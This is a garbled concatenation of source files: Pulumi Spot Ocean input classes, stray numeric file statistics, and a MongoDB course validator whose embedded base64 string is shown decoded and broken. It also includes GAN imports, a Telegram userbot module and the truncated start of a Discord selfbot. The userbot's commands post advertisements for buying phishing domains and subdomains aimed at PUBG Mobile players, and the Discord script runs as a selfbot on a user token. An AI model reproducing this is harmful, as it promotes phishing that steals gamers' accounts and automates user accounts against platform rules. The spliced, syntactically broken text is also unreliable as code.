@pulumi.input_type
class OceanLoggingExportS3Args:
def __init__(__self__, *,
id: pulumi.Input[str]):
"""
:param pulumi.Input[str] id: The identifier of The S3 data integration to export the logs to.
"""
pulumi.set(__self__, "id", id)
@property
@pulumi.getter
def id(self) -> pulumi.Input[str]:
"""
The identifier of The S3 data integration to export the logs to.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: pulumi.Input[str]):
pulumi.set(self, "id", value)
@pulumi.input_type
class OceanScheduledTaskArgs:
def __init__(__self__, *,
shutdown_hours: Optional[pulumi.Input['OceanScheduledTaskShutdownHoursArgs']] = None,
tasks: Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskTaskArgs']]]] = None):
"""
:param pulumi.Input['OceanScheduledTaskShutdownHoursArgs'] shutdown_hours: Set shutdown hours for cluster object.
:param pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskTaskArgs']]] tasks: The scheduling tasks for the cluster.
"""
if shutdown_hours is not None:
pulumi.set(__self__, "shutdown_hours", shutdown_hours)
if tasks is not None:
pulumi.set(__self__, "tasks", tasks)
@property
@pulumi.getter(name="shutdownHours")
def shutdown_hours(self) -> Optional[pulumi.Input['OceanScheduledTaskShutdownHoursArgs']]:
"""
Set shutdown hours for cluster object.
"""
return pulumi.get(self, "shutdown_hours")
@shutdown_hours.setter
def shutdown_hours(self, value: Optional[pulumi.Input['OceanScheduledTaskShutdownHoursArgs']]):
pulumi.set(self, "shutdown_hours", value)
@property
@pulumi.getter
def tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskTaskArgs']]]]:
"""
The scheduling tasks for the cluster.
"""
return pulumi.get(self, "tasks")
@tasks.setter
def tasks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskTaskArgs']]]]):
pulumi.set(self, "tasks", value)
@pulumi.input_type
class OceanScheduledTaskShutdownHoursArgs:
def __init__(__self__, *,
time_windows: pulumi.Input[Sequence[pulumi.Input[str]]],
is_enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] time_windows: Set time windows for shutdown hours. Specify a list of `timeWindows` with at least one time window Each string is in the format of: `ddd:hh:mm-ddd:hh:mm` where `ddd` = day of week = Sun | Mon | Tue | Wed | Thu | Fri | Sat, `hh` = hour 24 = 0 -23, `mm` = minute = 0 - 59. Time windows should not overlap. Required if `cluster.scheduling.isEnabled` is `true`. (Example: `Fri:15:30-Wed:14:30`).
:param pulumi.Input[bool] is_enabled: Describes whether the task is enabled. When true the task should run when false it should not run. Required for `cluster.scheduling.tasks` object.
"""
pulumi.set(__self__, "time_windows", time_windows)
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
@property
@pulumi.getter(name="timeWindows")
def time_windows(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
Set time windows for shutdown hours. Specify a list of `timeWindows` with at least one time window Each string is in the format of: `ddd:hh:mm-ddd:hh:mm` where `ddd` = day of week = Sun | Mon | Tue | Wed | Thu | Fri | Sat, `hh` = hour 24 = 0 -23, `mm` = minute = 0 - 59. Time windows should not overlap. Required if `cluster.scheduling.isEnabled` is `true`. (Example: `Fri:15:30-Wed:14:30`).
"""
return pulumi.get(self, "time_windows")
@time_windows.setter
def time_windows(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "time_windows", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Describes whether the task is enabled. When true the task should run when false it should not run. Required for `cluster.scheduling.tasks` object.
"""
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@pulumi.input_type
class OceanScheduledTaskTaskArgs:
def __init__(__self__, *,
cron_expression: pulumi.Input[str],
is_enabled: pulumi.Input[bool],
task_type: pulumi.Input[str]):
"""
:param pulumi.Input[str] cron_expression: A valid cron expression. The cron is running in UTC time zone and is in Unix cron format Cron Expression Validator Script. Only one of `frequency` or `cronExpression` should be used at a time. Required for `cluster.scheduling.tasks` object. (Example: `0 1 * * *`).
:param pulumi.Input[bool] is_enabled: Describes whether the task is enabled. When true the task should run when false it should not run. Required for `cluster.scheduling.tasks` object.
:param pulumi.Input[str] task_type: Valid values: `clusterRoll`. Required for `cluster.scheduling.tasks` object. (Example: `clusterRoll`).
"""
pulumi.set(__self__, "cron_expression", cron_expression)
pulumi.set(__self__, "is_enabled", is_enabled)
pulumi.set(__self__, "task_type", task_type)
@property
@pulumi.getter(name="cronExpression")
def cron_expression(self) -> pulumi.Input[str]:
"""
A valid cron expression. The cron is running in UTC time zone and is in Unix cron format Cron Expression Validator Script. Only one of `frequency` or `cronExpression` should be used at a time. Required for `cluster.scheduling.tasks` object. (Example: `0 1 * * *`).
"""
return pulumi.get(self, "cron_expression")
@cron_expression.setter
def cron_expression(self, value: pulumi.Input[str]):
pulumi.set(self, "cron_expression", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> pulumi.Input[bool]:
"""
Describes whether the task is enabled. When true the task should run when false it should not run. Required for `cluster.scheduling.tasks` object.
"""
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_enabled", value)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Valid values: `clusterRoll`. Required for `cluster.scheduling.tasks` object. (Example: `clusterRoll`).
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@pulumi.input_type
class OceanTagArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
value: pulumi.Input[str]):
"""
:param pulumi.Input[str] key: The tag key.
:param pulumi.Input[str] value: The tag value.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The tag key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
The tag value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class OceanUpdatePolicyArgs:
def __init__(__self__, *,
should_roll: pulumi.Input[bool],
conditioned_roll: Optional[pulumi.Input[bool]] = None,
roll_config: Optional[pulumi.Input['OceanUpdatePolicyRollConfigArgs']] = None):
"""
:param pulumi.Input[bool] should_roll: Enables the roll.
:param pulumi.Input[bool] conditioned_roll: Spot will perform a cluster Roll in accordance with a relevant modification of the cluster’s settings. When set to true , only specific changes in the cluster’s configuration will trigger a cluster roll (such as AMI, Key Pair, user data, instance types, load balancers, etc).
:param pulumi.Input['OceanUpdatePolicyRollConfigArgs'] roll_config: While used, you can control whether the group should perform a deployment after an update to the configuration.
"""
pulumi.set(__self__, "should_roll", should_roll)
if conditioned_roll is not None:
pulumi.set(__self__, "conditioned_roll", conditioned_roll)
if roll_config is not None:
pulumi.set(__self__, "roll_config", roll_config)
@property
@pulumi.getter(name="shouldRoll")
def should_roll(self) -> pulumi.Input[bool]:
"""
Enables the roll.
"""
return pulumi.get(self, "should_roll")
@should_roll.setter
def should_roll(self, value: pulumi.Input[bool]):
pulumi.set(self, "should_roll", value)
@property
@pulumi.getter(name="conditionedRoll")
def conditioned_roll(self) -> Optional[pulumi.Input[bool]]:
"""
Spot will perform a cluster Roll in accordance with a relevant modification of the cluster’s settings. When set to true , only specific changes in the cluster’s configuration will trigger a cluster roll (such as AMI, Key Pair, user data, instance types, load balancers, etc).
"""
return pulumi.get(self, "conditioned_roll")
@conditioned_roll.setter
def conditioned_roll(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "conditioned_roll", value)
@property
@pulumi.getter(name="rollConfig")
def roll_config(self) -> Optional[pulumi.Input['OceanUpdatePolicyRollConfigArgs']]:
"""
While used, you can control whether the group should perform a deployment after an update to the configuration.
"""
return pulumi.get(self, "roll_config")
@roll_config.setter
def roll_config(self, value: Optional[pulumi.Input['OceanUpdatePolicyRollConfigArgs']]):
pulumi.set(self, "roll_config", value)
@pulumi.input_type
class OceanUpdatePolicyRollConfigArgs:
def __init__(__self__, *,
batch_size_percentage: pulumi.Input[int],
launch_spec_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[int] batch_size_percentage: Sets the percentage of the instances to deploy in each batch.
:param pulumi.Input[Sequence[pulumi.Input[str]]] launch_spec_ids: List of virtual node group identifiers to be rolled.
"""
pulumi.set(__self__, "batch_size_percentage", batch_size_percentage)
if launch_spec_ids is not None:
pulumi.set(__self__, "launch_spec_ids", launch_spec_ids)
@property
@pulumi.getter(name="batchSizePercentage")
def batch_size_percentage(self) -> pulumi.Input[int]:
"""
Sets the percentage of the instances to deploy in each batch.
"""
return pulumi.get(self, "batch_size_percentage")
@batch_size_percentage.setter
def batch_size_percentage(self, value: pulumi.Input[int]):
pulumi.set(self, "batch_size_percentage", value)
@property
@pulumi.getter(name="launchSpecIds")
def launch_spec_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of virtual node group identifiers to be rolled.
"""
return pulumi.get(self, "launch_spec_ids")
@launch_spec_ids.setter
def launch_spec_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "launch_spec_ids", value)
@pulumi.input_type
class SuspensionSuspensionArgs:
def __init__(__self__, *,
name: pulumi.Input[str]):
"""
:param pulumi.Input[str] name: The name of process to suspend. Valid values: `"AUTO_HEALING" , "OUT_OF_STRATEGY", "PREVENTIVE_REPLACEMENT", "REVERT_PREFERRED", or "SCHEDULING"`.
"""
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of process to suspend. Valid values: `"AUTO_HEALING" , "OUT_OF_STRATEGY", "PREVENTIVE_REPLACEMENT", "REVERT_PREFERRED", or "SCHEDULING"`.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
| 42.014738
| 549
| 0.661079
| 46,873
| 401,955
| 5.485375
| 0.024726
| 0.103148
| 0.063816
| 0.040569
| 0.901718
| 0.864598
| 0.829132
| 0.79123
| 0.772414
| 0.751093
| 0
| 0.001814
| 0.224956
| 401,955
| 9,566
| 550
| 42.01913
| 0.823511
| 0.271458
| 0
| 0.766599
| 1
| 0
| 0.134094
| 0.060874
| 0
| 0
| 0
| 0
| 0
| 1
| 0.210249
| false
| 0
| 0.000851
| 0.006639
| 0.327886
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4521cebdc87164bfa8eae408f39649f22c0d58f6
| 13,818
|
py
|
Python
|
src/m101p/final/q4/validate_decoder.py
|
hemmerling/nosql-mongodb2013
|
bd2bb4f76234e0732b738f14cb474f7554c864c1
|
[
"Apache-2.0"
] | null | null | null |
src/m101p/final/q4/validate_decoder.py
|
hemmerling/nosql-mongodb2013
|
bd2bb4f76234e0732b738f14cb474f7554c864c1
|
[
"Apache-2.0"
] | null | null | null |
src/m101p/final/q4/validate_decoder.py
|
hemmerling/nosql-mongodb2013
|
bd2bb4f76234e0732b738f14cb474f7554c864c1
|
[
"Apache-2.0"
] | null | null | null |
import base64
code="
import pymongo
import urllib2
import urllib
import cookielib
import random
import re
import string
import sys
import getopt

# init the global cookie jar
cj = cookielib.CookieJar()
# declare the variables to connect to db
connection = None
db = None
webhost = "localhost:8082"
mongostr = "mongodb://localhost:27017"
db_name = "blog"

# this script will check that homework 3.2 is correct

# makes a little salt
def make_salt(n):
    salt = ""
    for i in range(n):
        salt = salt + random.choice(string.ascii_letters)
    return salt


# this is a validation script to make sure the blog works correctly.

def create_user(username, password):
    
    global cj

    try:
        print "Trying to create a test user ", username
        url = "http://{0}/signup".format(webhost)

        data = urllib.urlencode([("email",""),("username",username), ("password",password), ("verify",password)])
        request = urllib2.Request(url=url, data=data)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        f = opener.open(request)

        users = db.users
        # check that the user is in users collection
        user = users.find_one({'_id':username})
        if (user == None):
            print "Could not find the test user ", username, "in the users collection."
            return False
        print "Found the test user ", username, " in the users collection"

        # check that the user has been built
        result = f.read()
        expr = re.compile("Welcome\s+"+ username)
        if expr.search(result):
            return True
        
        print "When we tried to create a user, here is the output we got\n"
        print result
        
        return False
    except:
        print "the request to ", url, " failed, so your blog may not be running."
        raise
        return False


def try_to_login(username, password):

    try:
        print "Trying to login for test user ", username
        url = "http://{0}/login".format(webhost)

        data = urllib.urlencode([("username",username), ("password",password)])
        request = urllib2.Request(url=url, data=data)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        f = opener.open(request)

        # check for successful login
        result = f.read()
        expr = re.compile("Welcome\s+"+ username)
        if expr.search(result):
            return True

        print "When we tried to login, here is the output we got\n"
        print result
        return False
    except:
        print "the request to ", url, " failed, so your blog may not be running."
        return False


def add_blog_post(title,post,tags):

    try:
        print "Trying to submit a post with title ", title
        data = urllib.urlencode([("body",post), ("subject",title), ("tags",tags)])
        url = "http://{0}/newpost".format(webhost)
        request = urllib2.Request(url=url, data=data)
        cj.add_cookie_header(request)
        opener = urllib2.build_opener()
        f = opener.open(request)

        # check for successful login
        result = f.read()
        expr = re.compile(title + ".+" + post, re.DOTALL)

        if expr.search(result):
            return True

        print "When we tried to post, here is the output we got\n"
        print result
        return False

    except:
        print "the request to ", url, " failed, so your blog may not be running."
        raise

        return False

def add_blog_comment(title,post):

    try:
        print "+Trying to submit a blog comment for post with title", title
        url = "http://{0}/newcomment".format(webhost)
        
        doc = {}
        check_mongo_for_post(title, post, doc)

        permalink = doc['doc']['permalink']

        comment_name = make_salt(12)
        comment_body = make_salt(12)

        data = urllib.urlencode([("commentName",comment_name), ("commentBody",comment_body), ("permalink",permalink)])
        request = urllib2.Request(url=url, data=data)
        cj.add_cookie_header(request)
        opener = urllib2.build_opener()
        f = opener.open(request)

        # check for successful addition of comment on page
        result = f.read()
        expr = re.compile(title + ".+" + post, re.DOTALL)

        if not expr.search(result):
            print "When we tried to find the comment we posted at the  ", url, " here is what we got"
            print result
            return False


        # check for successful addition of comment..retrieve the doc again
        if(not check_mongo_for_post(title, post, doc)):
            print "Could not find comment in database"
            return False
        
        found = False
        if ('comments' in doc['doc']):
            for comment in doc['doc']['comments']:
                if (comment['body'] == comment_body and comment['author'] == comment_name):
                    found = True

        return found

    except:
        print "the request to ", url, " failed, so your blog may not be running."
        raise

        return False


# fetch the blog home page and return the link of the first post
def fetch_blog_home_page(posts):

    try:
        url = "http://{0}/".format(webhost)
        print "Trying to grab the blog home page at url and find the first post.", url
        request = urllib2.Request(url=url)
        cj.add_cookie_header(request)
        opener = urllib2.build_opener()
        f = opener.open(request)

        # Look for a post
        result = f.read()
        expr = re.compile("<a href=\"([^\"]+)\"\w*?>", re.DOTALL)


        match = expr.search(result)

        if match is not None:
            print "Fount a post url: ", match.group(1)
            posts.append(match.group(1))
            return True

        
        print "Hmm, can't seem to find a post. Is the blog populated with posts?"
        print "When we tried to read the blog index at ", url, " here is what we got"
        print result
        return False

    except:
        print "the request to ", url, " failed, so your blog may not be running."
        raise

        return False

# gets the likes value off the first commment or returns None
def fetch_likes(url):

    try:
        url = "http://{0}{1}".format(webhost, url)
        print "Trying to grab the number of likes for url ", url
        request = urllib2.Request(url=url)
        cj.add_cookie_header(request)
        opener = urllib2.build_opener()
        f = opener.open(request)


        # let's get the first form element
        result = f.read()
        expr = re.compile("<form[^>]*>.*?Likes:\s*(\d+)\s*<.*?</form>", re.DOTALL)

        match = expr.search(result)

        if match is not None:
            print "Likes value ", match.group(1)
            return int(match.group(1))

        print "Can't fetch the like value for the first comment. Perhaps the blog entry has no comments?"
        print "When we tried to read the blog permalink at ", url, " here is what we got"
        return None

    except:
        print "the request to ", url, " failed, so your blog may not be running."
        raise

        return None


# gets the likes value off the first commment or returns None
def click_on_like(permalink):

    print "Clicking on Like link for post: ", permalink
    try:
        expr =  re.compile("[^/]+/([^/]+)")
        match = expr.search(permalink)
        if match is None:
            return False

        permalink = match.group(1)
        url = "http://{0}/like".format(webhost)
        # print "Like POST url", url

        data = urllib.urlencode([("permalink",permalink), ("comment_ordinal","0")])
        request = urllib2.Request(url=url, data=data)
        cj.add_cookie_header(request)
        opener = urllib2.build_opener()
        f = opener.open(request)

        return True

    except:
        print "the request to ", url, " failed, so your blog may not be running."
        raise




# command line arg parsing to make folks happy who want to run at mongolabs or mongohq
# this functions uses global vars to communicate. forgive me.
def arg_parsing(argv):

    global webhost
    global mongostr
    global db_name

    try:
        opts, args = getopt.getopt(argv, "-p:-m:-d:")
    except getopt.GetoptError:
        print "usage validate.py -p webhost -m mongoConnectString -d databaseName"
        print "\twebhost defaults to {0}".format(webhost)
        print "\tmongoConnectionString default to {0}".format(mongostr)
        print "\tdatabaseName defaults to {0}".format(db_name)
        sys.exit(2)
    for opt, arg in opts:
        if (opt == '-h'):
            print "usage validate.py -p webhost -m mongoConnectString -d databaseName"
            sys.exit(2)
        elif opt in ("-p"):
            webhost = arg
            print "Overriding HTTP host to be ", webhost
        elif opt in ("-m"):
            mongostr = arg
            print "Overriding MongoDB connection string to be ", mongostr
        elif opt in ("-d"):
            db_name = arg
            print "Overriding MongoDB database to be ", db_name
            


# main section of the code
def main(argv):
            
    arg_parsing(argv)
    global connection
    global db

    print "Welcome to the M101 Final Exam, Question 4 Validation Checker"

    # connect to the db (mongostr was set in arg_parsing)
    connection = pymongo.Connection(mongostr, safe=True)
    db = connection[db_name]


    # grab the blog home page and find the first post
    posts = []
    if (not fetch_blog_home_page(posts)):
        print "I can't grab the home page of the blog"
        sys.exit(1)

    # now go to the permalink page for that post
    likes_value = fetch_likes(posts[0])

    if (likes_value is  None):
        print "Can't fetch the like value"
        sys.exit(1)

    click_on_like(posts[0])

    new_likes_value = fetch_likes(posts[0])

    if (new_likes_value != (likes_value + 1)):
        print "I was not able to increment the likes on a comment"
        print "old likes value was ", likes_value
        print "likes value after I clicked was ", new_likes_value
        print "Sorry, you have not solved it yet."
        sys.exit(1)


    print "Tests Passed for Final 4. Your validation code is 3f837hhg673ghd93hgf8"


if __name__ == "__main__":
    main(sys.argv[1:])







"
s = base64.b64decode(code)
print s
| 2,303
| 13,767
| 0.998697
| 10
| 13,818
| 1,380
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095228
| 0.000651
| 13,818
| 5
| 13,768
| 2,763.6
| 0.904121
| 0
| 0
| 0
| 0
| 0
| 0.995875
| 0.995875
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.25
| null | null | 0.25
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e12fcd5fcd554cb1b292cac0d846ae36ab330034
| 165
|
py
|
Python
|
deepdraken/image_generation/gans/__init__.py
|
DevavratSinghBisht/deepdraken
|
66671bee2d677d3e900077c5d1c66c0b1eff2cee
|
[
"Apache-2.0"
] | null | null | null |
deepdraken/image_generation/gans/__init__.py
|
DevavratSinghBisht/deepdraken
|
66671bee2d677d3e900077c5d1c66c0b1eff2cee
|
[
"Apache-2.0"
] | null | null | null |
deepdraken/image_generation/gans/__init__.py
|
DevavratSinghBisht/deepdraken
|
66671bee2d677d3e900077c5d1c66c0b1eff2cee
|
[
"Apache-2.0"
] | null | null | null |
from deepdraken.image_generation.gans.cgan import DCGAN
from deepdraken.image_generation.gans.cgan import CGAN
from deepdraken.image_generation.gans.wgan import WGAN
| 55
| 55
| 0.878788
| 24
| 165
| 5.916667
| 0.375
| 0.295775
| 0.401408
| 0.612676
| 0.838028
| 0.605634
| 0.605634
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 165
| 3
| 56
| 55
| 0.922078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
e14c323058e3cb60c6ffb1e58a3759985cab70ee
| 8,109
|
py
|
Python
|
userbot/modules/data-channel.py
|
RiSecID/Auto
|
d06ef712666a35ddbf0c123dbb86705096cbbb56
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/data-channel.py
|
RiSecID/Auto
|
d06ef712666a35ddbf0c123dbb86705096cbbb56
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/data-channel.py
|
RiSecID/Auto
|
d06ef712666a35ddbf0c123dbb86705096cbbb56
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
# Copyright (C) 2020 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module for getting the date
and time of any country or the userbot server. """
from datetime import datetime as dt
from pytz import country_names as c_n
from pytz import country_timezones as c_tz
from pytz import timezone as tz
from userbot import CMD_HELP, COUNTRY, TZ_NUMBER
from userbot.events import register
async def get_tz(con):
""" Get time zone of the given country. """
if "(Uk)" in con:
con = con.replace("Uk", "UK")
if "(Us)" in con:
con = con.replace("Us", "US")
if " Of " in con:
con = con.replace(" Of ", " of ")
if "(Western)" in con:
con = con.replace("(Western)", "(western)")
if "Minor Outlying Islands" in con:
con = con.replace("Minor Outlying Islands", "minor outlying islands")
if "Nl" in con:
con = con.replace("Nl", "NL")
for c_code in c_n:
if con == c_n[c_code]:
return c_tz[c_code]
try:
if c_n[con]:
return c_tz[con]
except KeyError:
return
#Terimakasih @JejakCheat
@register(outgoing=True, pattern="^.domainanim(?: |$)(.*)(?<![0-9])(?: |$)([0-9]+)?")
async def date_func(dat):
""" For .date command, return the date of
1. The country passed as an argument,
2. The default userbot country(set it by using .settime),
3. The server where the userbot runs.
"""
con = dat.pattern_match.group(1).title()
tz_num = dat.pattern_match.group(2)
d_form = "%d/%m/%y - %H:%M:%S"
c_name = ''
if len(con) > 4:
try:
c_name = c_n[con]
except KeyError:
c_name = con
timezones = await get_tz(con)
elif COUNTRY:
c_name = COUNTRY
tz_num = TZ_NUMBER
timezones = await get_tz(COUNTRY)
else:
await dat.edit(f"**BOT [TESTI](t.me/Jejakcheat14)\n**"
f"**{dt.now().strftime(d_form)}**\n\n"
f"Pembelian Phising `DOMAIN` PUBG Mobile Season 12 `Animation Version`\n"
f"Menggunakan `Server 5`\n"
f"Order ID : `Tertera pada Screenshot`\n\n"
f"Mau Beli Juga ? Chat [Jefanya Efandchris](t.me/JejakCheat14)\n"
f"#SenturyBot")
return
if not timezones:
await dat.edit("`Invaild country.`")
return
if len(timezones) == 1:
time_zone = timezones[0]
elif len(timezones) > 1:
if tz_num:
tz_num = int(tz_num)
time_zone = timezones[tz_num - 1]
else:
return_str = f"`{c_name} has multiple timezones:`\n"
for i, item in enumerate(timezones):
return_str += f"`{i+1}. {item}`\n"
return_str += "\n`Choose one by typing the number "
return_str += "in the command.`\n"
return_str += f"Example: .date {c_name} 2"
await dat.edit(return_str)
return
dtnow = dt.now(tz(time_zone)).strftime(d_form)
if c_name != COUNTRY:
await dat.edit(
f"`It's` **{dtnow}** `in {c_name}({time_zone} timezone).`")
return
elif COUNTRY:
await dat.edit(f"`It's` **{dtnow}** `here, in {COUNTRY}"
f"({time_zone} timezone).`")
return
#Terimakasih @JejakCheat
#Terimakasih @JejakCheat
@register(outgoing=True, pattern="^.domaintourney(?: |$)(.*)(?<![0-9])(?: |$)([0-9]+)?")
async def date_func(dat):
""" For .date command, return the date of
1. The country passed as an argument,
2. The default userbot country(set it by using .settime),
3. The server where the userbot runs.
"""
con = dat.pattern_match.group(1).title()
tz_num = dat.pattern_match.group(2)
d_form = "%d/%m/%y - %H:%M:%S"
c_name = ''
if len(con) > 4:
try:
c_name = c_n[con]
except KeyError:
c_name = con
timezones = await get_tz(con)
elif COUNTRY:
c_name = COUNTRY
tz_num = TZ_NUMBER
timezones = await get_tz(COUNTRY)
else:
await dat.edit(f"**BOT [TESTI](t.me/Jejakcheat14)\n**"
f"**{dt.now().strftime(d_form)}**\n\n"
f"Pembelian Phising `DOMAIN` PUBG Mobile Season 12 `Tournament`\n"
f"Menggunakan `Server 5`\n"
f"Order ID : `Tertera pada Screenshot`\n\n"
f"Mau Beli Juga ? Chat [Jefanya Efandchris](t.me/JejakCheat14)\n"
f"#SenturyBot")
return
if not timezones:
await dat.edit("`Invaild country.`")
return
if len(timezones) == 1:
time_zone = timezones[0]
elif len(timezones) > 1:
if tz_num:
tz_num = int(tz_num)
time_zone = timezones[tz_num - 1]
else:
return_str = f"`{c_name} has multiple timezones:`\n"
for i, item in enumerate(timezones):
return_str += f"`{i+1}. {item}`\n"
return_str += "\n`Choose one by typing the number "
return_str += "in the command.`\n"
return_str += f"Example: .date {c_name} 2"
await dat.edit(return_str)
return
dtnow = dt.now(tz(time_zone)).strftime(d_form)
if c_name != COUNTRY:
await dat.edit(
f"`It's` **{dtnow}** `in {c_name}({time_zone} timezone).`")
return
elif COUNTRY:
await dat.edit(f"`It's` **{dtnow}** `here, in {COUNTRY}"
f"({time_zone} timezone).`")
return
#Terimakasih @JejakCheat
@register(outgoing=True, pattern="^.subdomainanim(?: |$)(.*)(?<![0-9])(?: |$)([0-9]+)?")
async def date_func(dat):
""" For .date command, return the date of
1. The country passed as an argument,
2. The default userbot country(set it by using .settime),
3. The server where the userbot runs.
"""
con = dat.pattern_match.group(1).title()
tz_num = dat.pattern_match.group(2)
d_form = "%d/%m/%y - %H:%M:%S"
c_name = ''
if len(con) > 4:
try:
c_name = c_n[con]
except KeyError:
c_name = con
timezones = await get_tz(con)
elif COUNTRY:
c_name = COUNTRY
tz_num = TZ_NUMBER
timezones = await get_tz(COUNTRY)
else:
await dat.edit(f"**BOT [TESTI](t.me/Jejakcheat14)\n**"
f"**{dt.now().strftime(d_form)}**\n\n"
f"Pembelian Phising `SUBDOMAIN` PUBG Mobile Season 12 `Animation Version`\n"
f"Menggunakan `Server 5`\n"
f"Order ID : `Tertera pada Screenshot`\n\n"
f"Mau Beli Juga ? Chat [Jefanya Efandchris](t.me/JejakCheat14)\n"
f"#SenturyBot")
return
if not timezones:
await dat.edit("`Invaild country.`")
return
if len(timezones) == 1:
time_zone = timezones[0]
elif len(timezones) > 1:
if tz_num:
tz_num = int(tz_num)
time_zone = timezones[tz_num - 1]
else:
return_str = f"`{c_name} has multiple timezones:`\n"
for i, item in enumerate(timezones):
return_str += f"`{i+1}. {item}`\n"
return_str += "\n`Choose one by typing the number "
return_str += "in the command.`\n"
return_str += f"Example: .date {c_name} 2"
await dat.edit(return_str)
return
dtnow = dt.now(tz(time_zone)).strftime(d_form)
if c_name != COUNTRY:
await dat.edit(
f"`It's` **{dtnow}** `in {c_name}({time_zone} timezone).`")
return
elif COUNTRY:
await dat.edit(f"`It's` **{dtnow}** `here, in {COUNTRY}"
f"({time_zone} timezone).`")
return
| 32.306773
| 99
| 0.536318
| 1,067
| 8,109
| 3.963449
| 0.149016
| 0.028376
| 0.042563
| 0.027666
| 0.834713
| 0.809175
| 0.797825
| 0.778671
| 0.778671
| 0.778671
| 0
| 0.0136
| 0.329017
| 8,109
| 250
| 100
| 32.436
| 0.763646
| 0.045382
| 0
| 0.836066
| 0
| 0
| 0.280108
| 0.04123
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.032787
| 0
| 0.131148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e153f8acc4571a1285dcfac65274553d0739f692
| 22,239
|
py
|
Python
|
main.py
|
vanisthevillain/ChatPack
|
f7432cd43eede5984e033e225145810f8d9de37f
|
[
"BSL-1.0"
] | 1
|
2021-12-30T19:16:02.000Z
|
2021-12-30T19:16:02.000Z
|
main.py
|
TheSkidSlayer/ChatPack
|
f7432cd43eede5984e033e225145810f8d9de37f
|
[
"BSL-1.0"
] | null | null | null |
main.py
|
TheSkidSlayer/ChatPack
|
f7432cd43eede5984e033e225145810f8d9de37f
|
[
"BSL-1.0"
] | 1
|
2022-02-10T00:39:21.000Z
|
2022-02-10T00:39:21.000Z
|
import discord, os, random, json
from discord.ext import commands
with open('config.json') as f:
config = json.load(f)
token = config.get('token')
prefix = config.get('prefix')
vanis = commands.Bot(command_prefix=prefix, case_insensitive=True, self_bot=True)
vanis.remove_command("help")
@vanis.event
async def on_ready():
print(f""" \u001b[31m
╔════════════════════════════════════════════╗
